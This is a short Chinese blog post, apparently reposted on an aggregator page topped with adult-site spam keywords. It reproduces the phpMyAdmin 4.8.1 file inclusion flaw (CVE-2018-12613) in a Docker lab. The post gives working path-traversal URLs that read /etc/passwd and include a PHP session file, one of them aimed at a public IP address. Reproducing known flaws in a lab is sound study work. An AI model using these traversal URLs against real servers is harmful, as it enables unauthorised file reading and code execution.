日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

phpmyadmin 4.8.1 Remote File Inclusion(CVE-2018-12613)远程文件包含漏洞复现

發布時間:2023/12/18 php 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 phpmyadmin 4.8.1 Remote File Inclusion(CVE-2018-12613)远程文件包含漏洞复现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

漏洞描述

? 攻擊者利用發現在服務器上包含(查看和潛在執行)文件的漏洞。該漏洞來自一部分代碼,其中頁面在phpMyAdmin中被重定向和加載,以及對白名單頁面進行不正確的測試。 攻擊者必須經過身份驗證,但在這些情況下除外:

  • $ cfg [‘AllowArbitraryServer’] = true:攻擊者可以指定他/她已經控制的任何主機,并在phpMyAdmin上執行任意代碼;
  • $ cfg [‘ServerDefault’] = 0:這會繞過登錄并在沒有任何身份驗證的情況下運行易受攻擊的代碼。

漏洞影響范圍

? phpMyAdmin 4.8.0和4.8.1

啟動靶場

docker-compose up -d

執行URL

http://127.0.0.1:8080/index.php?target=db_sql.php?/../../../../../../../../../etc/passwd

漏洞存在

在SQL下執行以下命令查看數據庫位置

show global variables like "%datadir%"

查看sessionid后拼接并包含session

http://119.91.217.168:8080/index.php?target=db_sql.php?/../../../../../../../../tmp/sess_0c6795deaf15278c005fe2bc8b6114eb

總結

以上是生活随笔為你收集整理的phpmyadmin 4.8.1 Remote File Inclusion(CVE-2018-12613)远程文件包含漏洞复现的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。